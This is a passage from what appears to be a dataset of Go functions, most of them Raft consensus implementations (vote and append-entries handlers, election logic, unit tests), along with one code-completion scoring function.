r.log.LastIndex()\n\t\t\t\t\t//\n\t\t\t\t\tif lastIndex >= r.nextIndex[e.srcId] {\n\t\t\t\t\t\tr.matchIndex[e.srcId] = r.nextIndex[e.srcId]\n\t\t\t\t\t\tr.nextIndex[e.srcId] += 1\n\t\t\t\t\t\tr.updateCommitIndex()\n\t\t\t\t\t\tr.apply()\n\t\t\t\t\t\t// retry\n\t\t\t\t\t\tr.sndAppendEntries()\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\tcase *AppendEntries:\n\t\t\tif o.Term > r.currentTerm {\n\t\t\t\t// TODO\n\t\t\t\tr.state = FollowerState\n\t\t\t\tr.cleanVoteGranteds()\n\t\t\t\tr.cleanIndexAryOnLeader()\n\t\t\t\tr.resetElectionTimeout()\n\t\t\t\tr.resetHeatbeatTimeout()\n\t\t\t\tr.saveStates()\n\t\t\t\tr.appendEntries(o)\n\t\t\t}\n\t\tcase *RequestVote:\n\t\t\tif o.Term > r.currentTerm {\n\t\t\t\tr.state = FollowerState\n\t\t\t\tr.cleanVoteGranteds()\n\t\t\t\tr.cleanIndexAryOnLeader()\n\t\t\t\tr.resetElectionTimeout()\n\t\t\t\tr.resetHeatbeatTimeout()\n\t\t\t\tr.saveStates()\n\t\t\t\tr.votefor(o)\n\t\t\t}\n\t\tdefault:\n\t\t}\n\tcase BaseTimeoutEvt:\n\t\tr.heartbeatTimeoutCnt += 1\n\t\tif r.isHeatbeatTimeout() {\n\t\t\tr.resetHeatbeatTimeout()\n\t\t\tr.sndAppendEntries()\n\t\t}\n\n\tdefault:\n\t}\n}", "func (rf *Raft) AppendEntries(args *AppendEntriesArgs, reply *AppendEntriesReply) {\n\tif len(args.Entries) > 0 {\n\t\tDPrintf(\"peer-%d gets an AppendEntries RPC(args.LeaderId = %d, args.PrevLogIndex = %d, args.LeaderCommit = %d, args.Term = %d, rf.currentTerm = %d).\", rf.me, args.LeaderId, args.PrevLogIndex, args.LeaderCommit, args.Term, rf.currentTerm)\n\t} else {\n\t\tDPrintf(\"peer-%d gets an heartbeat(args.LeaderId = %d, args.Term = %d, args.PrevLogIndex = %d, args.LeaderCommit = %d).\", rf.me, args.LeaderId, args.Term, args.PrevLogIndex, args.LeaderCommit)\n\t}\n\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\t// initialize the reply.\n\treply.ConflictIndex = 1\n\treply.ConflictTerm = 0\n\t// 1. detect obsolete information, this can filter out old leader's heartbeat.\n\tif args.Term < rf.currentTerm {\n\t\tDPrintf(\"peer-%d got an obsolete AppendEntries RPC..., ignore it.(args.Term = %d, rf.currentTerm = %d.)\", rf.me, args.Term, rf.currentTerm)\n\t\treply.Term = rf.currentTerm\n\t\treply.Success = false\n\t\treturn\n\t}\n\n\t/* Can the old Leader receive an AppendEntries RPC from the new leader?\n\t * I think the answer is yes.\n\t * The old leader's heartbeat packets lost all the time,\n\t * and others will be elected as the new leader(may do not need this peer's vote, consider a 3 peers cluster),\n\t * then the new leader will heartbeat the old leader. So the old leader will learn this situation and convert to a Follower.\n\t */\n\n\t// reset the election timeout as soon as possible to prevent an unneeded election!\n\trf.resetElectionTimeout()\n\trf.currentTerm = args.Term\n\trf.persist()\n\treply.Term = args.Term\n\n\tif rf.state == Candidate {\n\t\tDPrintf(\"peer-%d calm down from a Candidate to a Follower!!!\", rf.me)\n\t\trf.state = Follower\n\t} else if rf.state == Leader {\n\t\tDPrintf(\"peer-%d degenerate from a Leader to a Follower!!!\", rf.me)\n\t\trf.state = Follower\n\t\trf.nonleaderCh <- true\n\t}\n\n\t// consistent check\n\t// 2. Reply false(refuse the new entries) if log doesn't contain an entry at prevLogIndex whose term matches prevLogTerm($5.3)\n\tif len(rf.log) < args.PrevLogIndex {\n\t\t// Then the leader will learn this situation and adjust this follower's matchIndex/nextIndex in its state, and AppendEntries RPC again.\n\t\treply.Success = false\n\t\treturn\n\t}\n\n\tif args.PrevLogIndex > 0 && rf.log[args.PrevLogIndex-1].Term != args.PrevLogTerm {\n\t\t// 3. If an existing entry conflicts with a new one(same index but different terms), delete the existing entry and all that follow it.\n\t\t// delete the log entries from PrevLogIndex to end(including PrevLogIndex).\n\t\tDPrintf(\"peer-%d fail to pass the consistency check, truncate the log\", rf.me)\n\t\trf.log = rf.log[:args.PrevLogIndex-1] // log[i:j] contains i~j-1, and we don't want to reserve log entry at PrevLogIndex. So...\n\t\trf.persist()\n\t\treply.Success = false\n\t\treply.ConflictTerm = rf.log[args.PrevLogIndex-2].Term\n\t\t// fill the reply.FirstIndexOfThatTerm\n\t\ti := 1\n\t\tfor i = args.PrevLogIndex - 1; i >= 1; i-- {\n\t\t\tif rf.log[i-1].Term == reply.ConflictTerm {\n\t\t\t\tcontinue\n\t\t\t} else {\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\treply.ConflictIndex = i + 1\n\t\treturn\n\t}\n\n\t// 4. Now this peer's log matches the leader's log at PrevLogIndex. Append any new entries not already in the log\n\tDPrintf(\"peer-%d AppendEntries RPC pass the consistent check at PrevLogIndex = %d!\", rf.me, args.PrevLogIndex)\n\t// now logs match at PrevLogIndex\n\t// NOTE: only if the logs don't match at PrevLogIndex, truncate the rf.log.\n\tpos := args.PrevLogIndex // pos is the index of the slice just after the element at PrevLogIndex.\n\ti := 0\n\tmismatch := false\n\tfor pos < len(rf.log) && i < len(args.Entries) {\n\t\tif rf.log[pos].Term == args.Entries[i].Term {\n\t\t\ti++\n\t\t\tpos++\n\t\t} else {\n\t\t\t// conflict!\n\t\t\tmismatch = true\n\t\t\tbreak\n\t\t}\n\t}\n\n\tif mismatch {\n\t\t// need adjustment. rf.log[pos].Term != args.Entries[i].Term\n\t\t// truncate the rf.log and append entries.\n\t\trf.log = rf.log[:pos]\n\t\trf.log = append(rf.log, args.Entries[i:]...)\n\t\trf.persist()\n\t} else {\n\t\t// there some elements in entries but not in rf.log\n\t\tif pos == len(rf.log) && i < len(args.Entries) {\n\t\t\trf.log = rf.log[:pos]\n\t\t\trf.log = append(rf.log, args.Entries[i:]...)\n\t\t\trf.persist()\n\t\t}\n\t}\n\t// now the log is consistent with the leader's. from 0 ~ PrevLogIndex + len(Entries). but whether the subsequents are consistent is unknown.\n\treply.Success = true\n\t// update the rf.commitIndex. If leaderCommit > commitIndex, set commitIndex = min(leaderCommit, index of last new entry)\n\tif rf.commitIndex < args.LeaderCommit {\n\t\t// we need to update commitIndex locally. Explictly update the old entries. See my note upon Figure8.\n\t\t// This step will exclude some candidates to be elected as the new leader!\n\t\t// commit!\n\t\told_commit_index := rf.commitIndex\n\n\t\tif args.LeaderCommit <= len(rf.log) {\n\t\t\trf.commitIndex = args.LeaderCommit\n\t\t} else {\n\t\t\trf.commitIndex = len(rf.log)\n\t\t}\n\t\tDPrintf(\"peer-%d Nonleader update its commitIndex from %d to %d. And it's len(rf.log) = %d.\", rf.me, old_commit_index, rf.commitIndex, len(rf.log))\n\n\t\t// apply. Now all the commands before rf.commitIndex will not be changed, and could be applied.\n\t\tgo func() {\n\t\t\trf.canApplyCh <- true\n\t\t}()\n\t}\n\treturn\n}", "func TestRaftPending(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftPending\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), newStorage())\n\t// Create n2 node.\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), newStorage())\n\tconnectAllNodes(n1, n2)\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn2.ProposeInitialMembership([]string{ID1, ID2})\n\n\t// Find out who leader is.\n\tvar leader *Raft\n\tvar follower *Raft\n\tselect {\n\tcase <-fsm1.leaderCh:\n\t\tleader = n1\n\t\tfollower = n2\n\tcase <-fsm2.leaderCh:\n\t\tleader = n2\n\t\tfollower = n1\n\t}\n\n\t// Prpose a command on leader.\n\tpending := leader.Propose([]byte(\"I'm data\"))\n\n\t// Block until the command concludes.\n\t<-pending.Done\n\n\t// \"Apply\" should return the exact command back.\n\tif pending.Err != nil {\n\t\tt.Fatal(\"expected no error returned in pending\")\n\t}\n\tif string(pending.Res.([]byte)) != \"I'm data\" {\n\t\tt.Fatal(\"expected exact command to be returned in pending.\")\n\t}\n\n\t// Propose to non-leader node should result an error.\n\tpending = follower.Propose([]byte(\"I'm data too\"))\n\n\t// Block until the command concludes.\n\t<-pending.Done\n\n\t// Should return an error \"ErrNodeNotLeader\" when propose command to non-leader node.\n\tif pending.Err != ErrNodeNotLeader {\n\t\tt.Fatalf(\"expected to get error %q when propose to non-leader node\", ErrNodeNotLeader)\n\t}\n}", "func (c *completer) addCandidate(ctx context.Context, cand *candidate) {\n\tobj := cand.obj\n\tif c.matchingCandidate(cand) {\n\t\tcand.score *= highScore\n\n\t\tif p := c.penalty(cand); p > 0 {\n\t\t\tcand.score *= (1 - p)\n\t\t}\n\t} else if isTypeName(obj) {\n\t\t// If obj is a *types.TypeName that didn't otherwise match, check\n\t\t// if a literal object of this type makes a good candidate.\n\n\t\t// We only care about named types (i.e. don't want builtin types).\n\t\tif _, isNamed := obj.Type().(*types.Named); isNamed {\n\t\t\tc.literal(ctx, obj.Type(), cand.imp)\n\t\t}\n\t}\n\n\t// Lower score of method calls so we prefer fields and vars over calls.\n\tif cand.hasMod(invoke) {\n\t\tif sig, ok := obj.Type().Underlying().(*types.Signature); ok && sig.Recv() != nil {\n\t\t\tcand.score *= 0.9\n\t\t}\n\t}\n\n\t// Prefer private objects over public ones.\n\tif !obj.Exported() && obj.Parent() != types.Universe {\n\t\tcand.score *= 1.1\n\t}\n\n\t// Slight penalty for index modifier (e.g. changing \"foo\" to\n\t// \"foo[]\") to curb false positives.\n\tif cand.hasMod(index) {\n\t\tcand.score *= 0.9\n\t}\n\n\t// Favor shallow matches by lowering score according to depth.\n\tcand.score -= cand.score * c.deepState.scorePenalty(cand)\n\n\tif cand.score < 0 {\n\t\tcand.score = 0\n\t}\n\n\tcand.name = deepCandName(cand)\n\tif item, err := c.item(ctx, *cand); err == nil {\n\t\tc.items = append(c.items, item)\n\t}\n}", "func (node *Node) runElection() {\n\tnode.currentTerm++\n\tcurrentTerm := node.currentTerm\n\tnode.state = candidate\n\tnode.votedFor = node.id\n\tnode.timeSinceTillLastReset = time.Now()\n\n\tlog.Printf(\"Node %d has become a candidate with currentTerm=%d\", node.id, node.currentTerm)\n\n\t// We vote for ourselves.\n\tvar votesReceived int32 = 1\n\n\t// Send votes to all the other machines in the raft group.\n\tfor _, nodeID := range node.participantNodes {\n\t\tgo func(id int) {\n\t\t\tvoteRequestArgs := RequestVoteArgs{\n\t\t\t\tterm: currentTerm,\n\t\t\t\tcandidateID: id,\n\t\t\t}\n\n\t\t\tvar reply RequestVoteReply\n\t\t\tlog.Printf(\"Sending a RequestVote to %d with args %+v\", id, voteRequestArgs)\n\n\t\t\tif err := node.server.Call(id, \"Node.RequestVote\", voteRequestArgs, &reply); err == nil {\n\t\t\t\tlog.Printf(\"Received a response for RequestVote from node %d saying %+v, for the election started by node %d\", id, reply, node.id)\n\n\t\t\t\tnode.mu.Lock()\n\t\t\t\tdefer node.mu.Unlock()\n\n\t\t\t\t// If the state of the current node has changed by the time the election response arrives then we must back off.\n\t\t\t\tif node.state != candidate {\n\t\t\t\t\tlog.Printf(\"The state of node %d has changed from candidate to %s while waiting for an election response\", node.id, node.state)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\t// If the node responds with a higher term then we must back off from the election.\n\t\t\t\tif reply.term > currentTerm {\n\t\t\t\t\tnode.updateStateToFollower(reply.term)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\tif reply.term == currentTerm {\n\t\t\t\t\tif reply.voteGranted {\n\t\t\t\t\t\tvotes := int(atomic.AddInt32(&votesReceived, 1))\n\t\t\t\t\t\t// Check for majority votes having been received.\n\t\t\t\t\t\tif votes > (len(node.participantNodes)+1)/2 {\n\t\t\t\t\t\t\tlog.Printf(\"The election has been won by node %d\", node.id)\n\t\t\t\t\t\t\tnode.updateStateToLeader()\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}(nodeID)\n\t}\n}", "func TestFollowerAppendEntries(t *testing.T) {\n\ttests := []struct {\n\t\tindex, term uint64\n\t\tents []pb.Entry\n\t\twents []pb.Entry\n\t\twunstable []pb.Entry\n\t}{\n\t\t{\n\t\t\t2, 2,\n\t\t\t[]pb.Entry{{Term: 3, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}, {Term: 3, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 3}},\n\t\t},\n\t\t{\n\t\t\t1, 1,\n\t\t\t[]pb.Entry{{Term: 3, Index: 2}, {Term: 4, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}, {Term: 3, Index: 2}, {Term: 4, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 2}, {Term: 4, Index: 3}},\n\t\t},\n\t\t{\n\t\t\t0, 0,\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}},\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}},\n\t\t\tnil,\n\t\t},\n\t\t{\n\t\t\t0, 0,\n\t\t\t[]pb.Entry{{Term: 3, Index: 1}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 1}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 1}},\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tstorage.Append([]pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}})\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, storage)\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.becomeFollower(2, 2)\n\n\t\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgApp, Term: 2, LogTerm: tt.term, Index: tt.index, Entries: tt.ents})\n\n\t\tif g := r.raftLog.allEntries(); !reflect.DeepEqual(g, tt.wents) {\n\t\t\tt.Errorf(\"#%d: ents = %+v, want %+v\", i, g, tt.wents)\n\t\t}\n\t\tif g := r.raftLog.unstableEntries(); !reflect.DeepEqual(g, tt.wunstable) {\n\t\t\tt.Errorf(\"#%d: unstableEnts = %+v, want %+v\", i, g, tt.wunstable)\n\t\t}\n\t}\n}", "func TestFollowerCheckMsgApp(t *testing.T) {\n\tents := []pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}}\n\ttests := []struct {\n\t\tterm uint64\n\t\tindex uint64\n\t\twindex uint64\n\t\twreject bool\n\t\twrejectHint uint64\n\t}{\n\t\t// match with committed entries\n\t\t{0, 0, 1, false, 0},\n\t\t{ents[0].Term, ents[0].Index, 1, false, 0},\n\t\t// match with uncommitted entries\n\t\t{ents[1].Term, ents[1].Index, 2, false, 0},\n\n\t\t// unmatch with existing entry\n\t\t{ents[0].Term, ents[1].Index, ents[1].Index, true, 2},\n\t\t// unexisting entry\n\t\t{ents[1].Term + 1, ents[1].Index + 1, ents[1].Index + 1, true, 2},\n\t}\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tstorage.Append(ents)\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, storage)\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.loadState(pb.HardState{Commit: 1})\n\t\tr.becomeFollower(2, 2)\n\n\t\tr.Step(pb.Message{From: 2, FromGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2},\n\t\t\tTo: 1, ToGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tType: pb.MsgApp, Term: 2, LogTerm: tt.term, Index: tt.index})\n\n\t\tmsgs := r.readMessages()\n\t\twmsgs := []pb.Message{\n\t\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2},\n\t\t\t\tType: pb.MsgAppResp, Term: 2, Index: tt.windex, Reject: tt.wreject, RejectHint: tt.wrejectHint},\n\t\t}\n\t\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\t\tt.Errorf(\"#%d: msgs = %+v, want %+v\", i, msgs, wmsgs)\n\t\t}\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\tgrantVote := false\n\trf.updateTerm(args.Term) // All servers: if args.Term > rf.currentTerm, set currentTerm, convert to follower\n\n\tswitch rf.state {\n\tcase Follower:\n\t\tif args.Term < rf.currentTerm {\n\t\t\tgrantVote = false\n\t\t} else if rf.votedFor == -1 || rf.votedFor == args.CandidateId {\n\t\t\tif len(rf.logs) == 0 {\n\t\t\t\tgrantVote = true\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tlastLogTerm := rf.logs[len(rf.logs) - 1].Term\n\t\t\tif (lastLogTerm == args.LastLogTerm && len(rf.logs) <= args.LastLogIndex) || lastLogTerm < args.LastLogTerm {\n\t\t\t\tgrantVote = true\n\t\t\t}\n\t\t}\n\tcase Leader:\n\t\t// may need extra operation since the sender might be out-dated\n\tcase Candidate:\n\t\t// reject because rf has already voted for itself since it's in\n\t\t// Candidate state\n\t}\n\n\tif grantVote {\n\t\t// DPrintf(\"Peer %d: Granted RequestVote RPC from %d.(@%s state)\\n\", rf.me, args.CandidateId, rf.state)\n\t\treply.VoteGranted = true\n\t\trf.votedFor = args.CandidateId\n\t\t// reset election timeout\n\t\trf.hasHeartbeat = true\n\t} else {\n\t\t// DPrintf(\"Peer %d: Rejected RequestVote RPC from %d.(@%s state)\\n\", rf.me, args.CandidateId, rf.state)\n\t\treply.VoteGranted = false\n\t}\n\treply.VotersTerm = rf.currentTerm\n\n\t// when deal with cluster member changes, may also need to reject Request\n\t// within MINIMUM ELECTION TIMEOUT\n}", "func TestReadOnlyForNewLeader(t *testing.T) {\n\tnodeConfigs := []struct {\n\t\tid uint64\n\t\tcommitted uint64\n\t\tapplied uint64\n\t\tcompact_index uint64\n\t}{\n\t\t{1, 1, 1, 0},\n\t\t{2, 2, 2, 2},\n\t\t{3, 2, 2, 2},\n\t}\n\tpeers := make([]stateMachine, 0)\n\tfor _, c := range nodeConfigs {\n\t\tstorage := NewMemoryStorage()\n\t\tdefer storage.Close()\n\t\tstorage.Append([]pb.Entry{{Index: 1, Term: 1}, {Index: 2, Term: 1}})\n\t\tstorage.SetHardState(pb.HardState{Term: 1, Commit: c.committed})\n\t\tif c.compact_index != 0 {\n\t\t\tstorage.Compact(c.compact_index)\n\t\t}\n\t\tcfg := newTestConfig(c.id, []uint64{1, 2, 3}, 10, 1, storage)\n\t\tcfg.Applied = c.applied\n\t\traft := newRaft(cfg)\n\t\tpeers = append(peers, raft)\n\t}\n\tnt := newNetwork(peers...)\n\n\t// Drop MsgApp to forbid peer a to commit any log entry at its term after it becomes leader.\n\tnt.ignore(pb.MsgApp)\n\t// Force peer a to become leader.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tsm := nt.peers[1].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Fatalf(\"state = %s, want %s\", sm.state, StateLeader)\n\t}\n\n\t// Ensure peer a drops read only request.\n\tvar windex uint64 = 4\n\twctx := []byte(\"ctx\")\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgReadIndex, Entries: []pb.Entry{{Data: wctx}}})\n\tif len(sm.readStates) != 0 {\n\t\tt.Fatalf(\"len(readStates) = %d, want zero\", len(sm.readStates))\n\t}\n\n\tnt.recover()\n\n\t// Force peer a to commit a log entry at its term\n\tfor i := 0; i < sm.heartbeatTimeout; i++ {\n\t\tsm.tick()\n\t}\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\tif sm.raftLog.committed != 4 {\n\t\tt.Fatalf(\"committed = %d, want 4\", sm.raftLog.committed)\n\t}\n\tlastLogTerm := sm.raftLog.zeroTermOnErrCompacted(sm.raftLog.term(sm.raftLog.committed))\n\tif lastLogTerm != sm.Term {\n\t\tt.Fatalf(\"last log term = %d, want %d\", lastLogTerm, sm.Term)\n\t}\n\n\t// Ensure peer a accepts read only request after it commits a entry at its term.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgReadIndex, Entries: []pb.Entry{{Data: wctx}}})\n\tif len(sm.readStates) != 1 {\n\t\tt.Fatalf(\"len(readStates) = %d, want 1\", len(sm.readStates))\n\t}\n\trs := sm.readStates[0]\n\tif rs.Index != windex {\n\t\tt.Fatalf(\"readIndex = %d, want %d\", rs.Index, windex)\n\t}\n\tif !bytes.Equal(rs.RequestCtx, wctx) {\n\t\tt.Fatalf(\"requestCtx = %v, want %v\", rs.RequestCtx, wctx)\n\t}\n}", "func (rf *Raft) handleVoteReply(reply* RequestVoteReply) {\n\tDebugPrint(\"%d(%d): receive vote reply from %d(%d), state: %d\\n\",\n\t\trf.me, rf.term, reply.To, reply.Term, rf.state)\n\tstart := time.Now()\n\tdefer calcRuntime(start, \"handleVoteReply\")\n\tif !rf.checkVote(reply.To, reply.Term, reply.MsgType, &reply.VoteGranted) {\n\t\treturn\n\t}\n\tif (rf.state == Candidate && reply.MsgType == MsgRequestVoteReply) ||\n\t\t(rf.state == PreCandidate && reply.MsgType == MsgRequestPrevoteReply) {\n\t\tDebugPrint(\"%d(%d): access vote reply from %d(%d), accept: %t, state: %d\\n\",\n\t\t\trf.me, rf.term, reply.To, reply.Term, reply.VoteGranted, rf.state)\n\t\tif reply.VoteGranted {\n\t\t\trf.votes[reply.To] = 1\n\t\t} else {\n\t\t\trf.votes[reply.To] = 0\n\t\t}\n\t\tquorum := len(rf.peers) / 2 + 1\n\t\taccept := 0\n\t\treject := 0\n\t\tfor _, v := range rf.votes {\n\t\t\tif v == 1 {\n\t\t\t\taccept += 1\n\t\t\t} else if v == 0 {\n\t\t\t\treject += 1\n\t\t\t}\n\t\t}\n\t\tif accept >= quorum {\n\t\t\tfor idx, v := range rf.votes {\n\t\t\t\tif v == 1 {\n\t\t\t\t\tDebugPrint(\"%d vote for me(%d).\\n\", idx, rf.me)\n\t\t\t\t}\n\t\t\t}\n\t\t\tDebugPrint(\"%d win.\\n\", rf.me)\n\t\t\tif rf.state == PreCandidate {\n\t\t\t\tfmt.Printf(\"The server %d, wins Pre-vote Election\\n\", rf.me)\n\t\t\t\trf.campaign(MsgRequestVote)\n\t\t\t} else {\n\t\t\t\tDebugPrint(\"%d win vote\\n\", rf.me)\n\t\t\t\trf.becomeLeader()\n\t\t\t\tfmt.Printf(\"The server %d, wins Election\\n\", rf.me)\n\t\t\t\t// rf.propose(nil, rf.raftLog.GetDataIndex())\n\t\t\t\trf.proposeNew(nil, rf.raftLog.GetDataIndex(), rf.me)\n\t\t\t}\n\t\t} else if reject == quorum {\n\t\t\tDebugPrint(\"%d has been reject by %d members\\n\", rf.me, reject)\n\t\t\trf.becomeFollower(rf.term, -1)\n\t\t}\n\t}\n\tDebugPrint(\"%d(%d): receive vote end\\n\", rf.me, rf.term)\n}", "func (r *RaftNode) CandidateLooksEligible(candLastLogIdx LogIndex, candLastLogTerm Term) bool {\n\tourLastLogTerm := r.getLastLogTerm()\n\tourLastLogIdx := r.getLastLogIndex()\n\tif r.verbose {\n\t\tlog.Printf(\"We have: lastLogTerm=%d, lastLogIdx=%d. They have: lastLogTerm=%d, lastLogIdx=%d\", ourLastLogTerm, ourLastLogIdx, candLastLogTerm, candLastLogIdx)\n\t}\n\n\tif ourLastLogTerm == candLastLogTerm {\n\t\treturn candLastLogIdx >= ourLastLogIdx\n\t}\n\treturn candLastLogTerm >= ourLastLogTerm\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tif rf.currentTerm < args.Term {\n\t\trf.debug(\"Updating term to new term %v\\n\", args.Term)\n\t\trf.currentTerm = args.Term\n\t\tatomic.StoreInt32(&rf.state, FOLLOWER)\n\t\trf.votedFor = LEADER_UNKNOWN\n\t}\n\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\n\t// late candidates\n\tif args.Term < rf.currentTerm {\n\t\trf.debug(\"Rejecting candidate %v. Reason: late term=%v\\n\", args.CandidateId, args.Term)\n\t\treturn\n\t}\n\n\t// avoid double vote\n\tif rf.votedFor != LEADER_UNKNOWN && rf.votedFor != args.CandidateId {\n\t\trf.debug(\"Rejecting candidate %v. Reason: already voted\\n\", args.CandidateId)\n\t\treturn\n\t}\n\n\tlastLogIndex := rf.lastEntryIndex()\n\n\t// reject old logs\n\tif rf.index(lastLogIndex).Term > args.LastLogTerm {\n\t\trf.debug(\"Rejecting candidate %v. Reason: old log\\n\", args.CandidateId)\n\t\treturn\n\t}\n\n\t// log is smaller\n\tif rf.index(lastLogIndex).Term == args.LastLogTerm && args.LastLogIndex < lastLogIndex {\n\t\trf.debug(\"Rejecting candidate %v. Reason: small log\\n\", args.CandidateId)\n\t\treturn\n\t}\n\n\trf.votedFor = args.CandidateId\n\trf.gotContacted = true\n\n\trf.debug(\"Granting vote to %v. me=(%v,%v), candidate=(%v,%v)\\n\", args.CandidateId, lastLogIndex, rf.index(lastLogIndex).Term, args.LastLogIndex, args.LastLogTerm)\n\treply.VoteGranted = true\n\n\t// save state\n\trf.persist(false)\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tdefer rf.persist()\n\n\treply.VoteGranted = false\n\treply.Term = rf.currentTerm\n\n\t// Rule for all servers: If RPC request or response contains term T > currentTerm: set currentTerm = T, convert to follower (§5.1)\n\tif args.Term > rf.currentTerm {\n\t\trf.convertToFollower(args.Term)\n\t}\n\n\t// 1. Reply false if term < currentTerm (§5.1)\n\tif args.Term < rf.currentTerm {\n\t\t_, _ = DPrintf(vote(\"[T%v] %v: Received RequestVote from %v | Discarded Vote | Received Lower Term \"), rf.currentTerm, rf.me, args.CandidateID, args.CandidateID)\n\t\treturn\n\t}\n\n\t/* 2. If\n\t *\t\t1. votedFor is null or candidateId\n\t *\t\t2. candidate’s log is at least as up-to-date as receiver’s log\n\t *\tgrant vote (§5.2, §5.4)\n\t */\n\n\t// Check 1 vote: should be able to vote or voted for candidate\n\tvoteCheck := rf.votedFor == noVote || rf.votedFor == args.CandidateID\n\t// Check 2 up-to-date = (same indices OR candidate's lastLogIndex > current peer's lastLogIndex)\n\tlastLogIndex, lastLogTerm := rf.lastLogEntryIndex(), rf.lastLogEntryTerm()\n\tlogCheck := lastLogTerm < args.LastLogTerm || (lastLogTerm == args.LastLogTerm && lastLogIndex <= args.LastLogIndex)\n\n\t// Both checks should be true to grant vote\n\tif voteCheck && logCheck {\n\t\treply.VoteGranted = true\n\t\t_, _ = DPrintf(vote(\"[T%v] %v: Received RequestVote from %v | Vote Successful\"), rf.currentTerm, rf.me, args.CandidateID)\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = args.CandidateID\n\t} else if !voteCheck {\n\t\t_, _ = DPrintf(vote(\"[T%v] %v: Received RequestVote from %v | Vote Failure | Already voted for %v\"), rf.currentTerm, rf.me, args.CandidateID, rf.votedFor)\n\t} else {\n\t\t_, _ = DPrintf(vote(\"[T%v] %v: Received RequestVote from %v | Vote Failure | No Up-To-Date Log | Received {LastLogTerm: %v, LastLogIndex: %v} | Current {LastLogTerm: %v, LastLogIndex: %v}\"),\n\t\t\trf.currentTerm, rf.me, args.CandidateID, args.LastLogTerm, args.LastLogIndex, lastLogTerm, lastLogIndex)\n\t}\n\trf.resetTTL()\n}", "func (r *Raft) becomeLeader() {\n\t// NOTE: Leader should propose a noop entry on its term\n\tr.State = StateLeader\n\tr.Vote = 0\n\tfor p, _ := range r.Prs {\n\t\tif p == r.id {\n\t\t\tcontinue\n\t\t}\n\t\tr.Prs[p].Match = 0\n\t\tr.Prs[p].Next = r.RaftLog.LastIndex() + 1\n\t}\n\t//r.initializeProgress()\n\n\t// send heartbeat\n\t//m := pb.Message{MsgType: pb.MessageType_MsgBeat, From: r.id, To: r.id}\n\t//r.sendMsgLocally(m)\n\t// send noop message\n\tr.sendInitialAppend()\n\tr.electionElapsed = 0\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.executeLock.Lock()\n\tdefer rf.executeLock.Unlock()\n\n\t//DPrintf(\"[ReceiveRequestVote] [me %v] from [peer %v] start\", rf.me, args.CandidateId)\n\trf.stateLock.Lock()\n\n\tdebugVoteArgs := &RequestVoteArgs{\n\t\tTerm: rf.currentTerm,\n\t\tCandidateId: rf.votedFor,\n\t\tLastLogIndex: int32(len(rf.log) - 1),\n\t\tLastLogTerm: rf.log[len(rf.log)-1].Term,\n\t}\n\tDPrintf(\"[ReceiveRequestVote] [me %#v] self info: %#v from [peer %#v] start\", rf.me, debugVoteArgs, args)\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\treply.LastLog = int32(len(rf.log) - 1)\n\treply.LastLogTerm = rf.log[reply.LastLog].Term\n\tif args.Term < rf.currentTerm {\n\t\tDPrintf(\"[ReceiveRequestVote] [me %v] from %v Term :%v <= currentTerm: %v, return\", rf.me, args.CandidateId, args.Term, 